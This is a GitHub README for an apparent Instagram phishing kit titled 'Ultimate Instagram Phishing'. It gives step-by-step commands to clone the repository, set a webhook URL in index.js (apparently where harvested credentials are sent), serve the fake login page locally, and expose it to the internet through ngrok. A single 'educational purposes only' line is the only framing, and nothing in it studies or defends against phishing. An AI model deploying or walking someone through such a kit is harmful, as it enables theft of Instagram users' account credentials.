Skip to content

Latest commit

 

History

History
22 lines (18 loc) · 514 Bytes

README.md

File metadata and controls

22 lines (18 loc) · 514 Bytes

Ultimate Instagram Phishing!!

Disclaimer: This is ONLY for educational purposes.

Use

  • Clone this repository:
git clone https://github.com/antonchu2006/ultimate-ig-webhook-phishing.git
cd ultimate-ig-webhook-phishing
  • Change webhook URL in index.js

  • Start a http web in the directory (or move repository files to apache / xampp / wampp html folder)

python3 -m http.server
  • Open webserver port OR start ngrok
./ngrok http <webserver port>
  • Check if it works!